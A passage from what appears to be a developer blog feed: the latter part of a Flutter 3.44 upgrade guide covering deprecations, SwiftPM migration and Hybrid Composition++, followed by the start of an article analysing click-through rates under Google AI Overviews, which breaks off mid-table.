&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt; &lt;span class="s2"&gt;"extends IconData&lt;/span&gt;&lt;span class="se"&gt;\|&lt;/span&gt;&lt;span class="s2"&gt;implements IconData"&lt;/span&gt; ~/.pub-cache/hosted/pub.dev/ | &lt;span class="nb"&gt;head&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;@mustBeConst&lt;/code&gt; annotation is the second half of that change, and it is deliberate. &lt;code&gt;IconData&lt;/code&gt; fields are marked as tree-shaking entrypoints, and const construction is what lets the toolchain drop unused icons from your font. Code that builds &lt;code&gt;IconData&lt;/code&gt; at runtime from a variable will now be rejected at compile time, which is a real constraint if you drive icons from a CMS or a remote config. Map the remote value to a const lookup table instead.&lt;/p&gt;

&lt;h2&gt;
  
  
  Hybrid Composition++, and why we are not shipping it yet
&lt;/h2&gt;

&lt;p&gt;HCPP is the most interesting thing in 3.44 and the one we are slowest to recommend. It is opt-in, and it should stay that way in your app for at least one more release.&lt;/p&gt;

&lt;p&gt;The mechanism is genuine engineering rather than a marketing line. Instead of round-tripping native views through offscreen buffers, HCPP delegates layer compositing to the Android OS through Vulkan, using hardware buffer swapchains and SurfaceControl transactions to synchronise the Flutter UI with native Android views. The Flutter team's own description of the result is specific: high-performance scrolling, accurate touch, and reliable SurfaceView support. If you have ever embedded a map or a video player and watched the scroll fall apart or a tap land 40 pixels off, that is the class of bug this targets.&lt;/p&gt;

&lt;p&gt;The constraints matter more than the benefits right now:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;HCPP requires Android API 34 or later, because it depends on native transaction synchronisation.&lt;/li&gt;
&lt;li&gt;The device must be able to render with Vulkan.&lt;/li&gt;
&lt;li&gt;It is enabled with the &lt;code&gt;--enable-hcpp&lt;/code&gt; flag or a meta-data entry in &lt;code&gt;AndroidManifest.xml&lt;/code&gt;, not by default.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;flutter run &lt;span class="nt"&gt;--enable-hcpp&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Read those requirements against your actual install base, not against the newest device on your desk. An Android app in India that still supports API 26 will run the old path for most of its users, which means HCPP gives you a second rendering path to test rather than a faster app. Enable it in a build flavour, measure it on the screens where you embed native views, and keep it behind the flag until your API 34+ share justifies owning both paths.&lt;/p&gt;

&lt;p&gt;The honest read: HCPP is the right destination and a poor Tuesday afternoon decision. It is also the strongest argument in this release for keeping your &lt;code&gt;minSdkVersion&lt;/code&gt; conversation on the roadmap, since the payoff arrives when your floor reaches API 34.&lt;/p&gt;

&lt;h2&gt;
  
  
  The deprecations to clear now, while they are still warnings
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Deprecated API&lt;/th&gt;
&lt;th&gt;Replacement&lt;/th&gt;
&lt;th&gt;Where it bites&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;onReorder&lt;/code&gt; in &lt;code&gt;ReorderableListView&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;onReorderItem&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The new callback reports a &lt;code&gt;newIndex&lt;/code&gt; that already accounts for the removed item, so delete your manual &lt;code&gt;if (newIndex &amp;gt; oldIndex) newIndex--&lt;/code&gt; fix&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;findChildIndexCallback&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;findItemIndexCallback&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ListView.separated&lt;/code&gt; and &lt;code&gt;SliverList.separated&lt;/code&gt;; a rename, but it is silent until you read the analyzer output&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;builder&lt;/code&gt; and &lt;code&gt;pageBuilder&lt;/code&gt; in &lt;code&gt;showCupertinoSheet&lt;/code&gt; and &lt;code&gt;CupertinoSheetRoute&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;scrollableBuilder&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Scrollable content inside a sheet; the new builder integrates with the sheet's drag animation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;--web-hot-reload&lt;/code&gt; flag&lt;/td&gt;
&lt;td&gt;No flag needed&lt;/td&gt;
&lt;td&gt;CI scripts and IDE run configurations, which is where stale flags hide&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;plugin_ffi&lt;/code&gt; template&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;plugin&lt;/code&gt; template with FFI support&lt;/td&gt;
&lt;td&gt;New plugin scaffolding only; existing plugins are unaffected&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The &lt;code&gt;onReorder&lt;/code&gt; change is the one worth doing by hand rather than with a rename. Almost every codebase has the index-adjustment workaround written into the callback, and &lt;code&gt;onReorderItem&lt;/code&gt; makes it wrong rather than unnecessary. Delete the workaround when you migrate the callback, or your list will reorder to the wrong slot in exactly the cases your tests do not cover.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;RawMenuAnchor&lt;/code&gt; callback ordering also changed in this release. If you built a custom menu on top of it, your callbacks now fire in a different order. That is a small blast radius and a genuinely confusing debugging session if you do not know it happened.&lt;/p&gt;

&lt;h2&gt;
  
  
  The staged upgrade plan we actually run
&lt;/h2&gt;

&lt;p&gt;Six steps, in this order. The order is the point: every step after the first is cheaper once the one before it is clean.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Upgrade the floor, not the app.&lt;/strong&gt; Move to 3.44.6 rather than 3.44.0. The 3.44 series has taken six patches since May, and 3.44.6 shipped on July 8, 2026 with no Dart version change, so the cherry-picks are stability fixes rather than new surface area.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;flutter upgrade
flutter &lt;span class="nt"&gt;--version&lt;/span&gt;   &lt;span class="c"&gt;# expect 3.44.6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2. Audit before you build.&lt;/strong&gt; Grep for &lt;code&gt;IconData&lt;/code&gt; subclasses and &lt;code&gt;onReorder&lt;/code&gt; usage, and list plugins without SwiftPM support. This is 30 minutes that decides whether step 4 takes an hour or two days.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Take the analyzer seriously for one afternoon.&lt;/strong&gt; Run &lt;code&gt;dart analyze&lt;/code&gt; and fix every deprecation warning in the table above while they are still warnings. Deprecated APIs get removed, and the cost of clearing them never goes down.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Let the iOS migration happen, then verify it.&lt;/strong&gt; Build with &lt;code&gt;--config-only&lt;/code&gt;, read the plugin warnings, and commit the Xcode project changes deliberately in their own commit. A reviewer can understand a SwiftPM migration commit. Nobody can review it mixed into a feature branch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Test the platform seams, not the widgets.&lt;/strong&gt; Your widget tests will pass. The risk in this release sits at the native boundary: plugins, platform views, icon fonts, and reorderable lists. Test those on real devices.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;6. Ship the SDK bump on its own.&lt;/strong&gt; No feature work in the upgrade release. When something regresses in production two days later, you want a one-line revert rather than an argument about which change caused it.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Workstream&lt;/th&gt;
&lt;th&gt;Typical effort (mid-size app)&lt;/th&gt;
&lt;th&gt;Risk if deferred to 2027&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SwiftPM migration and plugin audit&lt;/td&gt;
&lt;td&gt;1 to 2 engineer-days&lt;/td&gt;
&lt;td&gt;High. The CocoaPods registry is read-only from December 2, 2026, and unmigrated plugins stop receiving fixes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deprecation cleanup (&lt;code&gt;onReorder&lt;/code&gt;, &lt;code&gt;findChildIndexCallback&lt;/code&gt;, Cupertino sheets)&lt;/td&gt;
&lt;td&gt;0.5 to 1 engineer-day&lt;/td&gt;
&lt;td&gt;Medium. Warnings become removals in a later release, and the work grows with the codebase&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;IconData&lt;/code&gt; and icon-font fixes&lt;/td&gt;
&lt;td&gt;0.5 to 1 engineer-day&lt;/td&gt;
&lt;td&gt;High. This is a hard compile failure, not a warning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Material and Cupertino hygiene (de-fork, fix stray imports)&lt;/td&gt;
&lt;td&gt;1 to 2 engineer-days&lt;/td&gt;
&lt;td&gt;Medium. The package split is coming and forks are what make it expensive&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HCPP evaluation&lt;/td&gt;
&lt;td&gt;0.5 engineer-day, then park it&lt;/td&gt;
&lt;td&gt;Low. It is opt-in and your API 34+ share decides the timing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Our estimate for the whole exercise is two to four senior engineer-days for an app with 25 to 40 plugins, and most of the variance is in that first row. Teams with a heavy native surface (maps, video, payments SDKs, custom icon fonts) should plan for the top of the range. The real cost is usually the plugins you do not control, not the code you wrote.&lt;/p&gt;

&lt;h2&gt;
  
  
  India-specific considerations
&lt;/h2&gt;

&lt;p&gt;Two things change the calculation for teams shipping from or into India.&lt;/p&gt;

&lt;p&gt;The first is device mix. HCPP requires Android API 34 or later and a Vulkan-capable device. If your app supports the mid-range and older Android install base that most consumer products in India still serve, HCPP will not reach a meaningful share of your users this year. Treat it as a 2027 line item and spend the time on the SwiftPM audit instead, which has an actual deadline.&lt;/p&gt;

&lt;p&gt;The second is process, not code. If your app handles personal data, an SDK upgrade is a good moment to re-check what your plugins send off-device, because the &lt;a href="https://www.meity.gov.in/content/digital-personal-data-protection-act-2023" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023&lt;/a&gt; turns third-party SDK behaviour into your obligation rather than the vendor's. A plugin audit for SwiftPM support and a plugin audit for data flows read the same dependency list. Doing them in one pass is close to free, and it is the only time this quarter your team will willingly look at all 40 plugins. We design applications aligned with DPDP requirements, and the plugin inventory is where that work starts.&lt;/p&gt;

&lt;p&gt;For teams weighing the framework decision itself rather than the upgrade, our &lt;a href="https://ecorpit.com/react-native-vs-flutter-hiring-decision-framework-2026/" rel="noopener noreferrer"&gt;React Native versus Flutter hiring decision framework&lt;/a&gt; covers the staffing side, and the &lt;a href="https://ecorpit.com/dart-3-12-primary-constructors-dot-shorthands-guide-2026/" rel="noopener noreferrer"&gt;Dart 3.12 language changes&lt;/a&gt; that ship with this release cut real boilerplate once you are on 3.44. The &lt;a href="https://ecorpit.com/impeller-mandatory-flutter-android-ios-2026/" rel="noopener noreferrer"&gt;Impeller rendering changes&lt;/a&gt; are worth reading alongside the HCPP section, since both decide what your Android frame budget looks like.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we would not do this quarter
&lt;/h2&gt;

&lt;p&gt;Three things in this release look urgent and are not.&lt;/p&gt;

&lt;p&gt;Do not migrate imports to &lt;code&gt;material_ui&lt;/code&gt;. The package is not released. There is nothing to migrate to, and the deprecation warning that several posts describe does not exist in 3.44.&lt;/p&gt;

&lt;p&gt;Do not enable HCPP by default. It is opt-in for a reason, it needs API 34 and Vulkan, and shipping it broadly means owning two rendering paths through the next release cycle.&lt;/p&gt;

&lt;p&gt;Do not disable SwiftPM to make the upgrade quiet. It works, and it will keep working right up to December 2, 2026, at which point it becomes someone's emergency. Take the two days now.&lt;/p&gt;

&lt;h2&gt;
  
  
  FAQ
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Is Flutter 3.44 safe to use in production?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes. Flutter 3.44 reached stable in May 2026 and has since taken six patch releases, with 3.44.6 shipping on July 8, 2026 and requiring no Dart version change. Move to the latest patch rather than 3.44.0, test the native boundary on real devices, and ship the SDK bump without feature work attached.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Do I need to change my Material imports in Flutter 3.44?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. Contributions to Material and Cupertino were frozen on April 7, 2026, but the libraries still ship inside the SDK. The &lt;code&gt;material_ui&lt;/code&gt; package on pub.dev is a placeholder marked "coming soon", and 3.44 emits no deprecation warning on &lt;code&gt;package:flutter/material.dart&lt;/code&gt;. Keep your imports exactly as they are.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What happens if I ignore the SwiftPM migration?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Your builds keep working, because Flutter falls back to CocoaPods for plugins that lack SwiftPM support. The problem arrives on December 2, 2026, when the CocoaPods registry becomes read-only and no new pods or versions land in the trunk. Existing builds survive. New fixes do not reach you.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How do I turn off Swift Package Manager if it breaks my build?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Set &lt;code&gt;enable-swift-package-manager&lt;/code&gt; to &lt;code&gt;false&lt;/code&gt; under the &lt;code&gt;config&lt;/code&gt; subsection of the &lt;code&gt;flutter&lt;/code&gt; section in &lt;code&gt;pubspec.yaml&lt;/code&gt;. That applies to every contributor on the project, which is what you want. The per-user command &lt;code&gt;flutter config --no-enable-swift-package-manager&lt;/code&gt; will not be shared with your CI environment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why does my icon font package fail to compile on 3.44?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Flutter 3.44 marked &lt;code&gt;IconData&lt;/code&gt; as &lt;code&gt;final&lt;/code&gt; and &lt;code&gt;@mustBeConst&lt;/code&gt;, so packages that extend or implement it no longer compile. The fields are tree-shaking entrypoints, and const construction is what lets unused icons be dropped from the font. Replace subclassing with composition, and map any runtime icon values to a const lookup table.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should I enable Hybrid Composition++ in my Android app?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not by default yet. HCPP delegates layer compositing to the Android OS through Vulkan and improves scrolling and touch accuracy around embedded native views, but it requires Android API 34 or later and a Vulkan-capable device. Test it behind the &lt;code&gt;--enable-hcpp&lt;/code&gt; flag on the screens that embed native views.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is the actual breaking change in ReorderableListView?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;onReorder&lt;/code&gt; callback is deprecated in favour of &lt;code&gt;onReorderItem&lt;/code&gt;, which reports a &lt;code&gt;newIndex&lt;/code&gt; that already accounts for the item being removed before reinsertion. If you migrate the callback but keep the usual manual index adjustment, your list will reorder to the wrong position. Delete the workaround when you change the callback.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How long does a Flutter 3.44 upgrade take?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We budget two to four senior engineer-days for a mid-size app carrying 25 to 40 plugins, at roughly $600 to $1,600 as of July 2026. Most of the variance sits in the SwiftPM plugin audit. Apps with a heavy native surface such as maps, video, or payments SDKs should plan for the upper end.&lt;/p&gt;

&lt;h2&gt;
  
  
  How eCorpIT can help
&lt;/h2&gt;

&lt;p&gt;eCorpIT runs Flutter upgrades as a scoped piece of work rather than a background task that never finishes: a dependency and plugin audit, the SwiftPM migration with the plugin gaps documented, deprecation cleanup, and device testing across the native boundary where these releases actually break. Our senior engineering teams have been shipping Flutter applications since 2021, and we plan upgrades around your release calendar instead of Google's. If you want the 3.44 upgrade costed against your own plugin list before the December 2, 2026 CocoaPods deadline, &lt;a href="https://ecorpit.com/contact-us/" rel="noopener noreferrer"&gt;talk to our team&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://docs.flutter.dev/release/release-notes/release-notes-3.44.0" rel="noopener noreferrer"&gt;Flutter 3.44.0 release notes&lt;/a&gt; - Flutter documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.flutter.dev/packages-and-plugins/swift-package-manager/for-app-developers" rel="noopener noreferrer"&gt;Swift Package Manager for app developers&lt;/a&gt; - Flutter documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.flutter.dev/packages-and-plugins/swift-package-manager/for-plugin-authors" rel="noopener noreferrer"&gt;Swift Package Manager for plugin authors&lt;/a&gt; - Flutter documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blog.cocoapods.org/CocoaPods-Specs-Repo/" rel="noopener noreferrer"&gt;CocoaPods Specs repository becomes read-only&lt;/a&gt; - CocoaPods blog&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blog.flutter.dev/saying-goodbye-to-cocoapods-swift-package-manager-is-soon-the-default-in-flutter-645a92714a57" rel="noopener noreferrer"&gt;Saying goodbye to CocoaPods: Swift Package Manager is soon the default in Flutter&lt;/a&gt; - Jenn Magder, Flutter blog&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blog.flutter.dev/flutters-material-and-cupertino-code-freeze-d32d94c59c38" rel="noopener noreferrer"&gt;Flutter's Material and Cupertino code freeze&lt;/a&gt; - Justin McCandless, Flutter blog&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/flutter/flutter/issues/184093" rel="noopener noreferrer"&gt;Freeze Material and Cupertino during decoupling (issue 184093)&lt;/a&gt; - flutter/flutter&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/flutter/flutter/issues/101479" rel="noopener noreferrer"&gt;Move the material and cupertino packages outside of Flutter (issue 101479)&lt;/a&gt; - flutter/flutter&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/flutter/flutter/issues/189142" rel="noopener noreferrer"&gt;Flutter Release Version 3.44.6 (issue 189142)&lt;/a&gt; - flutter/flutter&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blog.flutter.dev/whats-new-in-flutter-3-44-b0cc1ad3c527" rel="noopener noreferrer"&gt;What's new in Flutter 3.44&lt;/a&gt; - Flutter blog&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.flutter.dev/release/breaking-changes" rel="noopener noreferrer"&gt;Breaking changes and migration guides&lt;/a&gt; - Flutter documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.flutter.dev/platform-integration/android/platform-views" rel="noopener noreferrer"&gt;Hosting native Android views with platform views&lt;/a&gt; - Flutter documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://pub.dev/packages/material_ui" rel="noopener noreferrer"&gt;material_ui package&lt;/a&gt; - pub.dev&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dart.dev/blog/announcing-dart-3-12" rel="noopener noreferrer"&gt;Announcing Dart 3.12&lt;/a&gt; - Dart blog&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/flutter/flutter/pull/181345" rel="noopener noreferrer"&gt;Mark IconData final and mustBeConst (PR 181345)&lt;/a&gt; - flutter/flutter&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/flutter/flutter/pull/178242" rel="noopener noreferrer"&gt;Deprecate onReorder callback (PR 178242)&lt;/a&gt; - flutter/flutter&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/flutter/flutter/pull/182516" rel="noopener noreferrer"&gt;Add a CLI flag for toggling HCPP use (PR 182516)&lt;/a&gt; - flutter/flutter&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.meity.gov.in/content/digital-personal-data-protection-act-2023" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023&lt;/a&gt; - Ministry of Electronics and Information Technology, Government of India&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.indiacode.nic.in/handle/123456789/22037?locale=en" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023 (No. 22 of 2023), official text&lt;/a&gt; - India Code&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Last updated: July 16, 2026.&lt;/p&gt;

</description>
      <category>flutter</category>
    </item>
    <item>
      <title>Keyword selection after AI Overviews: a 2026 framework for queries that still send clicks</title>
      <dc:creator>Manu Shukla</dc:creator>
      <pubDate>Wed, 15 Jul 2026 18:43:44 +0000</pubDate>
      <link>https://dev.to/mr_manushukla/keyword-selection-after-ai-overviews-a-2026-framework-for-queries-that-still-send-clicks-9d</link>
      <guid>https://dev.to/mr_manushukla/keyword-selection-after-ai-overviews-a-2026-framework-for-queries-that-still-send-clicks-9d</guid>
      <description>&lt;h1&gt;
  
  
  Keyword selection after AI Overviews: a 2026 framework for queries that still send clicks
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Summary.&lt;/strong&gt; Between 16 April and 15 July 2026, twelve answer-shaped queries earned this site 307,668 impressions and 909 clicks. That is a blended clickthrough rate of 0.295%. Over the same 90 days, three queries that were not answer-shaped earned 378 impressions and 22 clicks, a 5.82% CTR, roughly 20 times better on a fraction of the volume. One query ranked at average position 2.77 and converted 0.149% of its impressions, while another sitting worse at position 4.23 converted 16.07%. The position was not the variable. The shape of the question was. This matches the largest public study available: Ahrefs analysed 300,000 keywords and found that as of December 2025 the presence of an AI Overview correlates with a 58% lower CTR for the top-ranking page, up from 34.5% in their April 2025 study. Ranking first on a question Google answers itself is not a win. It is 168,145 impressions and 348 clicks, which is what "ios 27 release date" paid us. This article gives the scoring framework we now run every topic through before we write a word.&lt;/p&gt;

&lt;p&gt;The uncomfortable part is that the failing keywords look like wins in every dashboard. High volume, good position, terrible economics.&lt;/p&gt;

&lt;h2&gt;
  
  
  The number that should end the position-one conversation
&lt;/h2&gt;

&lt;p&gt;Ahrefs re-ran their AI Overview study using December 2025 data, comparing 150,000 keywords with an AI Overview present against 150,000 informational keywords without one, measured against a December 2023 baseline from before the rollout.&lt;/p&gt;

&lt;p&gt;The findings are specific. In December 2023, average position-one CTR for informational keywords was 0.076. By December 2025 it had fallen to 0.039. For the keywords that now trigger an AI Overview, position-one CTR went from 0.073 to 0.016. Correcting for the general decline, the AI Overview itself accounts for roughly a 58% reduction.&lt;/p&gt;

&lt;p&gt;Ryan Law, Director of Content Marketing at Ahrefs, put the arithmetic in a sentence:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"For every 100 clicks you could historically earn for a top-ranking page, Google now 'keeps' 58."&lt;br&gt;
Ryan Law, Director of Content Marketing, Ahrefs&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The per-position table from that study is the part most people miss, and it changes the strategy:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Position in search results&lt;/th&gt;
&lt;th&gt;CTR impact when an AI Overview is present&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;-58.0%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;-50.8%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;-46.4%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;-38.8%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;-32.6%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;-30.5%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;-29.7%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;-28.8%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;-29.7%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;-19.4%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Read that column downward. The damage is worst at position one and mildest at position ten. Climbing the rankings on an AI Overview query moves you into the zone where the AI Overview hurts most. You are not competing for the click. You are competing for what is left after the answer panel has taken it, and the better you rank, the larger the share it takes.&lt;/p&gt;

&lt;p&gt;Ahrefs also found around 9% of AI Overviews appear outside position one, and their conclusion was blunt: AI Overviews "siphon away the majority of the clicks once available to top-ranking pages."&lt;/p&gt;

&lt;p&gt;Corroboration is broad. Ahrefs cite Seer Interactive at 49.4% to 65.2%, Kevin Indig at over 50%, Authoritas at 47.5%, and the Daily Mail reporting 80% to 90% lower CTR. The range is wide. The direction is not in dispute.&lt;/p&gt;

&lt;h2&gt;
  
  
  What our own Search Console data shows
&lt;/h2&gt;

&lt;p&gt;Public studies are averages across other people's sites. Here is what it looks like on one small site with a dominant topic cluster.&lt;/p&gt;

&lt;p&gt;This is eCorpIT's Google Search Console data for 16 April to 15 July 2026. Our CTR by average position across the site:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Average position&lt;/th&gt;
&lt;th&gt;Site CTR&lt;/th&gt;
&lt;th&gt;Keywords at this position&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;28.44%&lt;/td&gt;
&lt;td&gt;38&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;16.63%&lt;/td&gt;
&lt;td&gt;37&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;10.82%&lt;/td&gt;
&lt;td&gt;47&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;3.94%&lt;/td&gt;
&lt;td&gt;79&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;3.56%&lt;/td&gt;
&lt;td&gt;104&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;2.96%&lt;/td&gt;
&lt;td&gt;128&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;1.14%&lt;/td&gt;
&lt;td&gt;183&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;1.67%&lt;/td&gt;
&lt;td&gt;148&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;2.90%&lt;/td&gt;
&lt;td&gt;89&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;1.50%&lt;/td&gt;
&lt;td&gt;62&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That curve looks normal. Position one earns 28.44%, and there is a cliff between position 3 at 10.82% and position 4 at 3.94%, a 64% drop across a single rank.&lt;/p&gt;

&lt;p&gt;Now put individual queries against that curve, and the picture breaks.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Query&lt;/th&gt;
&lt;th&gt;Avg position&lt;/th&gt;
&lt;th&gt;Impressions&lt;/th&gt;
&lt;th&gt;Clicks&lt;/th&gt;
&lt;th&gt;CTR&lt;/th&gt;
&lt;th&gt;Site average at that position&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;ios 27&lt;/td&gt;
&lt;td&gt;2.77&lt;/td&gt;
&lt;td&gt;9,385&lt;/td&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;0.149%&lt;/td&gt;
&lt;td&gt;10.82% at position 3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ios 27 release date 2026&lt;/td&gt;
&lt;td&gt;4.60&lt;/td&gt;
&lt;td&gt;7,163&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;0.084%&lt;/td&gt;
&lt;td&gt;3.94% at position 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ios 27 release date&lt;/td&gt;
